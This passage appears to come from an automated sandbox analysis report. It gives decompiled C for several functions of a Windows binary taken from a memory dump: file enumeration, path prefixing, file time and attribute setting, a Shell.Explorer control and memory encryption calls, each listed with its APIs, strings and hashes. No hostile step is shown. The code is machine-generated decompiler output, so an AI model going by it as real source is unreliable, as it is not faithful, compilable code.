                                                                            															__eflags = _t193 - 0x5c;
                                                                            															if(_t193 == 0x5c) {
                                                                            																goto L51;
                                                                            															} else {
                                                                            																__eflags = _t193 - 0x3a;
                                                                            																if(_t193 == 0x3a) {
                                                                            																	goto L51;
                                                                            																} else {
                                                                            																	_t115 = 0;
                                                                            																}
                                                                            															}
                                                                            														}
                                                                            														asm("sbb eax, eax");
                                                                            														_v344 =  ~(_t115 & 0x000000ff) & _t169 - _t154 + 0x00000001;
                                                                            														E001AE920(_t202,  &_v336, _t202, 0x140);
                                                                            														_t227 = _t226 + 0xc;
                                                                            														_t214 = FindFirstFileExA(_t154, _t202,  &_v336, _t202, _t202, _t202);
                                                                            														_t123 = _v340;
                                                                            														__eflags = _t214 - 0xffffffff;
                                                                            														if(_t214 != 0xffffffff) {
                                                                            															_t173 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
                                                                            															__eflags = _t173;
                                                                            															_v348 = _t173 >> 2;
                                                                            															do {
                                                                            																__eflags = _v336.cFileName - 0x2e;
                                                                            																if(_v336.cFileName != 0x2e) {
                                                                            																	L64:
                                                                            																	_push(_t123);
                                                                            																	_push(_v344);
                                                                            																	_t123 =  &(_v336.cFileName);
                                                                            																	_push(_t154);
                                                                            																	_push(_t123);
                                                                            																	L28();
                                                                            																	_t227 = _t227 + 0x10;
                                                                            																	__eflags = _t123;
                                                                            																	if(_t123 != 0) {
                                                                            																		goto L54;
                                                                            																	} else {
                                                                            																		goto L65;
                                                                            																	}
                                                                            																} else {
                                                                            																	_t177 = _v291;
                                                                            																	__eflags = _t177;
                                                                            																	if(_t177 == 0) {
                                                                            																		goto L65;
                                                                            																	} else {
                                                                            																		__eflags = _t177 - 0x2e;
                                                                            																		if(_t177 != 0x2e) {
                                                                            																			goto L64;
                                                                            																		} else {
                                                                            																			__eflags = _v290;
                                                                            																			if(_v290 == 0) {
                                                                            																				goto L65;
                                                                            																			} else {
                                                                            																				goto L64;
                                                                            																			}
                                                                            																		}
                                                                            																	}
                                                                            																}
                                                                            																goto L58;
                                                                            																L65:
                                                                            																_t128 = FindNextFileA(_t214,  &_v336);
                                                                            																__eflags = _t128;
                                                                            																_t123 = _v340;
                                                                            															} while (_t128 != 0);
                                                                            															_t194 =  *_t123;
                                                                            															_t178 = _v348;
                                                                            															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
                                                                            															__eflags = _t178 - _t131;
                                                                            															if(_t178 != _t131) {
                                                                            																E001B5030(_t154, _t202, _t214, _t194 + _t178 * 4, _t131 - _t178, 4, E001B9E2B);
                                                                            															}
                                                                            														} else {
                                                                            															_push(_t123);
                                                                            															_push(_t202);
                                                                            															_push(_t202);
                                                                            															_push(_t154);
                                                                            															L28();
                                                                            															L54:
                                                                            															_t202 = _t123;
                                                                            														}
                                                                            														__eflags = _t214 - 0xffffffff;
                                                                            														if(_t214 != 0xffffffff) {
                                                                            															FindClose(_t214);
                                                                            														}
                                                                            														_t124 = _t202;
                                                                            													} else {
                                                                            														_t124 =  &(_t154[1]);
                                                                            														__eflags = _t169 -  &(_t154[1]);
                                                                            														if(_t169 ==  &(_t154[1])) {
                                                                            															goto L47;
                                                                            														} else {
                                                                            															_push(_t213);
                                                                            															_push(0);
                                                                            															_push(0);
                                                                            															_push(_t154);
                                                                            															L28();
                                                                            														}
                                                                            													}
                                                                            													L58:
                                                                            													__eflags = _v16 ^ _t221;
                                                                            													return E001AE203(_t124, _v16 ^ _t221);
                                                                            												} else {
                                                                            													goto L34;
                                                                            												}
                                                                            											}
                                                                            										} else {
                                                                            											_t138 = 0xc;
                                                                            											L36:
                                                                            											return _t138;
                                                                            										}
                                                                            									} else {
                                                                            										goto L22;
                                                                            									}
                                                                            									goto L68;
                                                                            									L22:
                                                                            									_t195 = _v16;
                                                                            									 *((intOrPtr*)(_v24 + _t198)) = _t195;
                                                                            									_t198 = _t198 + 4;
                                                                            									_t191 = _t195 + _v12;
                                                                            									_v16 = _t195 + _v12;
                                                                            									__eflags = _t198 - _t150;
                                                                            								} while (_t198 != _t150);
                                                                            								goto L23;
                                                                            							}
                                                                            						} else {
                                                                            							_t199 = _t198 | 0xffffffff;
                                                                            							L24:
                                                                            							E001B7A50(0);
                                                                            							goto L25;
                                                                            						}
                                                                            					} else {
                                                                            						while(1) {
                                                                            							_v8 = 0x3f2a;
                                                                            							_v6 = _t159;
                                                                            							_t146 = E001BDD80( *_t207,  &_v8);
                                                                            							__eflags = _t146;
                                                                            							if(_t146 != 0) {
                                                                            								_push( &_v36);
                                                                            								_push(_t146);
                                                                            								_push( *_t207);
                                                                            								L38();
                                                                            								_t223 = _t223 + 0xc;
                                                                            							} else {
                                                                            								_t146 =  &_v36;
                                                                            								_push(_t146);
                                                                            								_push(0);
                                                                            								_push(0);
                                                                            								_push( *_t207);
                                                                            								L28();
                                                                            								_t223 = _t223 + 0x10;
                                                                            							}
                                                                            							_t199 = _t146;
                                                                            							__eflags = _t199;
                                                                            							if(_t199 != 0) {
                                                                            								break;
                                                                            							}
                                                                            							_t207 = _t207 + 4;
                                                                            							_t159 = 0;
                                                                            							__eflags =  *_t207;
                                                                            							if( *_t207 != 0) {
                                                                            								continue;
                                                                            							} else {
                                                                            								_t150 = _v336.cAlternateFileName;
                                                                            								_t198 = _v36;
                                                                            								goto L9;
                                                                            							}
                                                                            							goto L68;
                                                                            						}
                                                                            						L25:
                                                                            						E001BA1ED( &_v36);
                                                                            						_t91 = _t199;
                                                                            						goto L26;
                                                                            					}
                                                                            				} else {
                                                                            					_t147 = E001B7ECC();
                                                                            					_t218 = 0x16;
                                                                            					 *_t147 = _t218;
                                                                            					E001B7DAB();
                                                                            					_t91 = _t218;
                                                                            					L26:
                                                                            					return _t91;
                                                                            				}
                                                                            				L68:
                                                                            			}


                                                                            APIs
                                                                            • _free.LIBCMT ref: 001B9FAF
                                                                              • Part of subcall function 001B7DBB: IsProcessorFeaturePresent.KERNEL32(00000017,001B7DAA,0000002C,001CA968,001BAF68,00000000,00000000,001B8599,?,?,001B7DB7,00000000,00000000,00000000,00000000,00000000), ref: 001B7DBD
                                                                              • Part of subcall function 001B7DBB: GetCurrentProcess.KERNEL32(C0000417,001CA968,0000002C,001B7AE8,00000016,001B8599), ref: 001B7DDF
                                                                              • Part of subcall function 001B7DBB: TerminateProcess.KERNEL32(00000000), ref: 001B7DE6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                            • String ID: *?$.
                                                                            • API String ID: 2667617558-3972193922
                                                                            • Opcode ID: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
                                                                            • Instruction ID: ba587f7ff8ca5e12303b51873279a1ac8656d8b3bef24f47ffea9cb5ee58641f
                                                                            • Opcode Fuzzy Hash: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
                                                                            • Instruction Fuzzy Hash: F8518075E00209AFDF14DFA8C881AFDBBB5EF98320F24816DE954E7341E7359A028B50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 80%
                                                                            			E00197570(void* __ecx, void* __edx) {
                                                                            				void* __esi;
                                                                            				char _t54;
                                                                            				signed int _t57;
                                                                            				void* _t61;
                                                                            				signed int _t62;
                                                                            				signed int _t68;
                                                                            				signed int _t85;
                                                                            				void* _t90;
                                                                            				void* _t99;
                                                                            				void* _t101;
                                                                            				intOrPtr* _t106;
                                                                            				void* _t108;
                                                                            
                                                                            				_t99 = __edx;
                                                                            				E001AD870(E001C1298, _t108);
                                                                            				E001AD940();
                                                                            				_t106 =  *((intOrPtr*)(_t108 + 0xc));
                                                                            				if( *_t106 == 0) {
                                                                            					L3:
                                                                            					_t101 = 0x802;
                                                                            					E0019FAB1(_t108 - 0x1010, _t106, 0x802);
                                                                            					L4:
                                                                            					_t81 =  *((intOrPtr*)(_t108 + 8));
                                                                            					E00197773(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x407c, 0x800);
                                                                            					_t113 =  *((short*)(_t108 - 0x407c)) - 0x3a;
                                                                            					if( *((short*)(_t108 - 0x407c)) == 0x3a) {
                                                                            						__eflags =  *((char*)(_t108 + 0x10));
                                                                            						if(__eflags == 0) {
                                                                            							E0019FA89(__eflags, _t108 - 0x1010, _t108 - 0x407c, _t101);
                                                                            							E00196EF9(_t108 - 0x307c);
                                                                            							_push(0);
                                                                            							_t54 = E0019A1B1(_t108 - 0x307c, _t99, __eflags, _t106, _t108 - 0x307c);
                                                                            							_t85 =  *(_t108 - 0x2074);
                                                                            							 *((char*)(_t108 + 0x13)) = _t54;
                                                                            							__eflags = _t85 & 0x00000001;
                                                                            							if((_t85 & 0x00000001) != 0) {
                                                                            								__eflags = _t85 & 0xfffffffe;
                                                                            								E0019A12F(_t106, _t85 & 0xfffffffe);
                                                                            							}
                                                                            							E0019943C(_t108 - 0x2034);
                                                                            							 *((intOrPtr*)(_t108 - 4)) = 1;
                                                                            							_t57 = E00199BE6(_t108 - 0x2034, __eflags, _t108 - 0x1010, 0x11);
                                                                            							__eflags = _t57;
                                                                            							if(_t57 != 0) {
                                                                            								_push(0);
                                                                            								_push(_t108 - 0x2034);
                                                                            								_push(0);
                                                                            								_t68 = E0019399D(_t81, _t99);
                                                                            								__eflags = _t68;
                                                                            								if(_t68 != 0) {
                                                                            									E001994DA(_t108 - 0x2034);
                                                                            								}
                                                                            							}
                                                                            							E0019943C(_t108 - 0x50a0);
                                                                            							__eflags =  *((char*)(_t108 + 0x13));
                                                                            							 *((char*)(_t108 - 4)) = 2;
                                                                            							if( *((char*)(_t108 + 0x13)) != 0) {
                                                                            								_t62 = E00199768(_t108 - 0x50a0, _t106, _t106, 5);
                                                                            								__eflags = _t62;
                                                                            								if(_t62 != 0) {
                                                                            									SetFileTime( *(_t108 - 0x509c), _t108 - 0x2054, _t108 - 0x204c, _t108 - 0x2044);
                                                                            								}
                                                                            							}
                                                                            							E0019A12F(_t106,  *(_t108 - 0x2074));
                                                                            							E0019946E(_t108 - 0x50a0);
                                                                            							_t90 = _t108 - 0x2034;
                                                                            						} else {
                                                                            							E0019943C(_t108 - 0x60c4);
                                                                            							_push(1);
                                                                            							_push(_t108 - 0x60c4);
                                                                            							_push(0);
                                                                            							 *((intOrPtr*)(_t108 - 4)) = 0;
                                                                            							E0019399D(_t81, _t99);
                                                                            							_t90 = _t108 - 0x60c4;
                                                                            						}
                                                                            						_t61 = E0019946E(_t90);
                                                                            					} else {
                                                                            						E00196BF5(_t113, 0x53, _t81 + 0x1e, _t106);
                                                                            						_t61 = E00196E03(0x1d00e0, 3);
                                                                            					}
                                                                            					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
                                                                            					return _t61;
                                                                            				}
                                                                            				_t112 =  *((intOrPtr*)(_t106 + 2));
                                                                            				if( *((intOrPtr*)(_t106 + 2)) != 0) {
                                                                            					goto L3;
                                                                            				} else {
                                                                            					_t101 = 0x802;
                                                                            					E0019FAB1(_t108 - 0x1010, 0x1c2490, 0x802);
                                                                            					E0019FA89(_t112, _t108 - 0x1010, _t106, 0x802);
                                                                            					goto L4;
                                                                            				}
                                                                            			}
















                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 00197575
                                                                            • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00197711
                                                                              • Part of subcall function 0019A12F: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00199F65,?,?,?,00199DFE,?,00000001,00000000,?,?), ref: 0019A143
                                                                              • Part of subcall function 0019A12F: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00199F65,?,?,?,00199DFE,?,00000001,00000000,?,?), ref: 0019A174
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: File$Attributes$H_prologTime
                                                                            • String ID: :
                                                                            • API String ID: 1861295151-336475711
                                                                            • Opcode ID: 1c3edd5e943ff0e1a792bfb66fdc95c0ab45847ddc17133b38c5dca8a657061b
                                                                            • Instruction ID: f94e4c24627ac15ace60cac8f29bd2e0b2cec72648c4c5c72439bba20fef2b0e
                                                                            • Opcode Fuzzy Hash: 1c3edd5e943ff0e1a792bfb66fdc95c0ab45847ddc17133b38c5dca8a657061b
                                                                            • Instruction Fuzzy Hash: 8241A171804118AAEF25EB64DD5AEEF777CAF65300F4040E9B605A3082DB749F89CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 81%
                                                                            			E0019B32C(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                            				short _v4096;
                                                                            				short _v4100;
                                                                            				signed short* _t30;
                                                                            				long _t32;
                                                                            				short _t33;
                                                                            				void* _t39;
                                                                            				signed short* _t52;
                                                                            				void* _t53;
                                                                            				signed short* _t62;
                                                                            				void* _t66;
                                                                            				intOrPtr _t69;
                                                                            				signed short* _t71;
                                                                            				intOrPtr _t73;
                                                                            
                                                                            				E001AD940();
                                                                            				_t71 = _a4;
                                                                            				if( *_t71 != 0) {
                                                                            					E0019B4C6(_t71);
                                                                            					_t66 = E001B2B33(_t71);
                                                                            					_t30 = E0019B4F2(_t71);
                                                                            					__eflags = _t30;
                                                                            					if(_t30 == 0) {
                                                                            						_t32 = GetCurrentDirectoryW(0x7ff,  &_v4100);
                                                                            						__eflags = _t32;
                                                                            						if(_t32 == 0) {
                                                                            							L22:
                                                                            							_t33 = 0;
                                                                            							__eflags = 0;
                                                                            							L23:
                                                                            							goto L24;
                                                                            						}
                                                                            						__eflags = _t32 - 0x7ff;
                                                                            						if(_t32 > 0x7ff) {
                                                                            							goto L22;
                                                                            						}
                                                                            						__eflags = E0019B5CD( *_t71 & 0x0000ffff);
                                                                            						if(__eflags == 0) {
                                                                            							E0019AEA5(__eflags,  &_v4100, 0x800);
                                                                            							_t39 = E001B2B33( &_v4100);
                                                                            							_t69 = _a12;
                                                                            							__eflags = _t69 - _t39 + _t66 + 4;
                                                                            							if(_t69 <= _t39 + _t66 + 4) {
                                                                            								goto L22;
                                                                            							}
                                                                            							E0019FAB1(_a8, L"\\\\?\\", _t69);
                                                                            							E0019FA89(__eflags, _a8,  &_v4100, _t69);
                                                                            							__eflags =  *_t71 - 0x2e;
                                                                            							if(__eflags == 0) {
                                                                            								__eflags = E0019B5CD(_t71[1] & 0x0000ffff);
                                                                            								if(__eflags != 0) {
                                                                            									_t71 =  &(_t71[2]);
                                                                            									__eflags = _t71;
                                                                            								}
                                                                            							}
                                                                            							L19:
                                                                            							_push(_t69);
                                                                            							L20:
                                                                            							_push(_t71);
                                                                            							L21:
                                                                            							_push(_a8);
                                                                            							E0019FA89(__eflags);
                                                                            							_t33 = 1;
                                                                            							goto L23;
                                                                            						}
                                                                            						_t13 = _t66 + 6; // 0x6
                                                                            						_t69 = _a12;
                                                                            						__eflags = _t69 - _t13;
                                                                            						if(_t69 <= _t13) {
                                                                            							goto L22;
                                                                            						}
                                                                            						E0019FAB1(_a8, L"\\\\?\\", _t69);
                                                                            						_v4096 = 0;
                                                                            						E0019FA89(__eflags, _a8,  &_v4100, _t69);
                                                                            						goto L19;
                                                                            					}
                                                                            					_t52 = E0019B4C6(_t71);
                                                                            					__eflags = _t52;
                                                                            					if(_t52 == 0) {
                                                                            						_t53 = 0x5c;
                                                                            						__eflags =  *_t71 - _t53;
                                                                            						if( *_t71 != _t53) {
                                                                            							goto L22;
                                                                            						}
                                                                            						_t62 =  &(_t71[1]);
                                                                            						__eflags =  *_t62 - _t53;
                                                                            						if( *_t62 != _t53) {
                                                                            							goto L22;
                                                                            						}
                                                                            						_t73 = _a12;
                                                                            						_t9 = _t66 + 6; // 0x6
                                                                            						__eflags = _t73 - _t9;
                                                                            						if(_t73 <= _t9) {
                                                                            							goto L22;
                                                                            						}
                                                                            						E0019FAB1(_a8, L"\\\\?\\", _t73);
                                                                            						E0019FA89(__eflags, _a8, L"UNC", _t73);
                                                                            						_push(_t73);
                                                                            						_push(_t62);
                                                                            						goto L21;
                                                                            					}
                                                                            					_t2 = _t66 + 4; // 0x4
                                                                            					__eflags = _a12 - _t2;
                                                                            					if(_a12 <= _t2) {
                                                                            						goto L22;
                                                                            					}
                                                                            					E0019FAB1(_a8, L"\\\\?\\", _a12);
                                                                            					_push(_a12);
                                                                            					goto L20;
                                                                            				} else {
                                                                            					_t33 = 0;
                                                                            					L24:
                                                                            					return _t33;
                                                                            				}
                                                                            			}

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: UNC$\\?\
                                                                            • API String ID: 0-253988292
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 70%
                                                                            			E001A8A07(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                            				void* __esi;
                                                                            				intOrPtr _t18;
                                                                            				char _t19;
                                                                            				intOrPtr* _t23;
                                                                            				signed int _t25;
                                                                            				void* _t26;
                                                                            				intOrPtr* _t28;
                                                                            				void* _t38;
                                                                            				void* _t43;
                                                                            				intOrPtr _t44;
                                                                            				signed int* _t48;
                                                                            
                                                                            				_t44 = _a4;
                                                                            				_t43 = __ecx;
                                                                            				 *((intOrPtr*)(__ecx + 4)) = _t44;
                                                                            				_t18 = E001AD82C(__edx, _t44, __eflags, 0x30);
                                                                            				_a4 = _t18;
                                                                            				if(_t18 == 0) {
                                                                            					_t19 = 0;
                                                                            					__eflags = 0;
                                                                            				} else {
                                                                            					_t19 = E001A83B5(_t18);
                                                                            				}
                                                                            				 *((intOrPtr*)(_t43 + 0xc)) = _t19;
                                                                            				if(_t19 == 0) {
                                                                            					return _t19;
                                                                            				} else {
                                                                            					 *((intOrPtr*)(_t19 + 0x18)) = _t44;
                                                                            					E001A9184( *((intOrPtr*)(_t43 + 0xc)), L"Shell.Explorer");
                                                                            					E001A931D( *((intOrPtr*)(_t43 + 0xc)), 1);
                                                                            					E001A92D3( *((intOrPtr*)(_t43 + 0xc)), 1);
                                                                            					_t23 = E001A9238( *((intOrPtr*)(_t43 + 0xc)));
                                                                            					_t28 = _t23;
                                                                            					if(_t28 == 0) {
                                                                            						L7:
                                                                            						__eflags =  *(_t43 + 0x10);
                                                                            						if( *(_t43 + 0x10) != 0) {
                                                                            							E001A8581(_t43);
                                                                            							_t25 =  *(_t43 + 0x10);
                                                                            							_push(0);
                                                                            							_push(0);
                                                                            							_push(0);
                                                                            							 *((char*)(_t43 + 0x25)) = 0;
                                                                            							_t38 =  *_t25;
                                                                            							_push(0);
                                                                            							__eflags =  *(_t43 + 0x20);
                                                                            							if( *(_t43 + 0x20) == 0) {
                                                                            								_push(L"about:blank");
                                                                            							} else {
                                                                            								_push( *(_t43 + 0x20));
                                                                            							}
                                                                            							_t23 =  *((intOrPtr*)(_t38 + 0x2c))(_t25);
                                                                            						}
                                                                            						L12:
                                                                            						return _t23;
                                                                            					}
                                                                            					_t10 = _t43 + 0x10; // 0x10
                                                                            					_t48 = _t10;
                                                                            					_t26 =  *((intOrPtr*)( *_t28))(_t28, 0x1c412c, _t48);
                                                                            					_t23 =  *((intOrPtr*)( *_t28 + 8))(_t28);
                                                                            					if(_t26 >= 0) {
                                                                            						goto L7;
                                                                            					}
                                                                            					 *_t48 =  *_t48 & 0x00000000;
                                                                            					goto L12;
                                                                            				}
                                                                            			}

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Shell.Explorer$about:blank
                                                                            • API String ID: 0-874089819
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 20%
                                                                            			E0019E862(void* __ebx, void* __edi, intOrPtr _a4, signed int _a8, char _a12, intOrPtr _a16) {
                                                                            				void* __esi;
                                                                            				void* __ebp;
                                                                            				intOrPtr* _t11;
                                                                            				intOrPtr* _t12;
                                                                            				signed char _t13;
                                                                            				void* _t17;
                                                                            				signed char _t18;
                                                                            				void* _t20;
                                                                            				signed int _t22;
                                                                            				signed int _t30;
                                                                            				void* _t31;
                                                                            				void* _t32;
                                                                            				intOrPtr _t33;
                                                                            				signed int _t36;
                                                                            
                                                                            				_t32 = __edi;
                                                                            				_t17 = __ebx;
                                                                            				_t11 =  *0x1d7358; // 0x0
                                                                            				if(_t11 == 0) {
                                                                            					E0019E7E3(0x1d7350);
                                                                            					_t11 =  *0x1d7358; // 0x0
                                                                            				}
                                                                            				_t36 = _a8;
                                                                            				_t22 = _t36 & 0xfffffff0;
                                                                            				_t30 = 0 | _a16 != 0x00000000;
                                                                            				if(_a12 == 0) {
                                                                            					_t12 =  *0x1d735c; // 0x0
                                                                            					if(_t12 == 0) {
                                                                            						goto L10;
                                                                            					} else {
                                                                            						_t13 =  *_t12(_a4, _t22, _t30);
                                                                            						if(_t13 == 0) {
                                                                            							_push(L"CryptUnprotectMemory failed");
                                                                            							goto L6;
                                                                            						}
                                                                            					}
                                                                            				} else {
                                                                            					if(_t11 == 0) {
                                                                            						L10:
                                                                            						_push(_t17);
                                                                            						_t13 = GetCurrentProcessId();
                                                                            						_t31 = 0;
                                                                            						_t18 = _t13;
                                                                            						if(_t36 != 0) {
                                                                            							_push(_t32);
                                                                            							_t33 = _a4;
                                                                            							_t20 = _t18 + 0x4b;
                                                                            							do {
                                                                            								_t13 = _t31 + _t20;
                                                                            								 *(_t31 + _t33) =  *(_t31 + _t33) ^ _t13;
                                                                            								_t31 = _t31 + 1;
                                                                            							} while (_t31 < _t36);
                                                                            						}
                                                                            					} else {
                                                                            						_t13 =  *_t11(_a4, _t22, _t30);
                                                                            						if(_t13 == 0) {
                                                                            							_push(L"CryptProtectMemory failed");
                                                                            							L6:
                                                                            							_push(0x1d00e0);
                                                                            							_t13 = E00196CC9(E001AE214(E00196CCE(_t22)), 0x1d00e0, 0x1d00e0, 2);
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				return _t13;
                                                                            			}


















                                                                            APIs
                                                                              • Part of subcall function 0019E7E3: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0019E802
                                                                              • Part of subcall function 0019E7E3: GetProcAddress.KERNEL32(001D7350,CryptUnprotectMemory), ref: 0019E812
                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,0019E85C), ref: 0019E8E3
                                                                            Strings
                                                                            • CryptUnprotectMemory failed, xrefs: 0019E8DB
                                                                            • CryptProtectMemory failed, xrefs: 0019E8A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AddressProc$CurrentProcess
                                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                            • API String ID: 2190909847-396321323
                                                                            • Opcode ID: 9546a0be91a5fd7a43448b752edc20391c28e8305f0970862b1d0aec066ca7c9
                                                                            • Instruction ID: 6f6766dc4f6e9cd137599e5f05d9f36294e558debbd0debba319b53ece6a612e
                                                                            • Opcode Fuzzy Hash: 9546a0be91a5fd7a43448b752edc20391c28e8305f0970862b1d0aec066ca7c9
                                                                            • Instruction Fuzzy Hash: E41136307053153BEF15DB78CC41B7E3BC9EF95B54B48802EF8009A2D2EB60ED5192A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 75%
                                                                            			E001912D7(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
                                                                            				struct HWND__* _t20;
                                                                            				struct HWND__* _t21;
                                                                            
                                                                            				if(_a8 == 0x30) {
                                                                            					E0019D6E4(0x1d0078, _a4);
                                                                            				} else {
                                                                            					_t27 = _a8 - 0x110;
                                                                            					if(_a8 == 0x110) {
                                                                            						E0019D70B(0x1d0078, _t27, _a4, _a20, _a28 & 1);
                                                                            						if((_a28 & 0x00000001) != 0) {
                                                                            							_t20 =  *0x1cdfd4(_a4);
                                                                            							if(_t20 != 0) {
                                                                            								_t21 = GetDlgItem(_t20, 0x3021);
                                                                            								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
                                                                            									SetWindowTextW(_t21, 0x1c22e4);
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				return 0;
                                                                            			}






                                                                            APIs
                                                                              • Part of subcall function 0019D70B: _swprintf.LIBCMT ref: 0019D731
                                                                              • Part of subcall function 0019D70B: _strlen.LIBCMT ref: 0019D752
                                                                              • Part of subcall function 0019D70B: SetDlgItemTextW.USER32(?,001CD154,?), ref: 0019D7B2
                                                                              • Part of subcall function 0019D70B: GetWindowRect.USER32(?,?), ref: 0019D7EC
                                                                              • Part of subcall function 0019D70B: GetClientRect.USER32(?,?), ref: 0019D7F8
                                                                            • GetDlgItem.USER32(00000000,00003021), ref: 0019131B
                                                                            • SetWindowTextW.USER32(00000000,001C22E4), ref: 00191331
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                            • String ID: 0
                                                                            • API String ID: 2622349952-4108050209
                                                                            • Opcode ID: 88b9d8dd02a2eee18bfc2f34a025366e2b6cf4223add6bf8bf176d115ab5e06c
                                                                            • Instruction ID: f1b7e1a55dc32c32ace848e1d5fde01ee1b3d6ce8faaa7e4125e7c874de28de2
                                                                            • Opcode Fuzzy Hash: 88b9d8dd02a2eee18bfc2f34a025366e2b6cf4223add6bf8bf176d115ab5e06c
                                                                            • Instruction Fuzzy Hash: E3F0AF74580249B7DF260F609C09BE93F69BF147A5F408018FC89919E1C778CAD1EB20
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 79%
                                                                            			E001A04BA(void* __ecx, void* __ebp, void* _a4) {
                                                                            				void* __esi;
                                                                            				long _t2;
                                                                            				void* _t6;
                                                                            
                                                                            				_t6 = __ecx;
                                                                            				_t2 = WaitForSingleObject(_a4, 0xffffffff);
                                                                            				if(_t2 == 0xffffffff) {
                                                                            					_push(GetLastError());
                                                                            					return E00196CC9(E00196CCE(_t6, 0x1d00e0, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0x1d00e0, 0x1d00e0, 2);
                                                                            				}
                                                                            				return _t2;
                                                                            			}







                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,001A05D9,?,?,001A064E,?,?,?,?,?,001A0638), ref: 001A04C0
                                                                            • GetLastError.KERNEL32(?,?,001A064E,?,?,?,?,?,001A0638), ref: 001A04CC
                                                                              • Part of subcall function 00196CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00196CEC
                                                                            Strings
                                                                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 001A04D5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
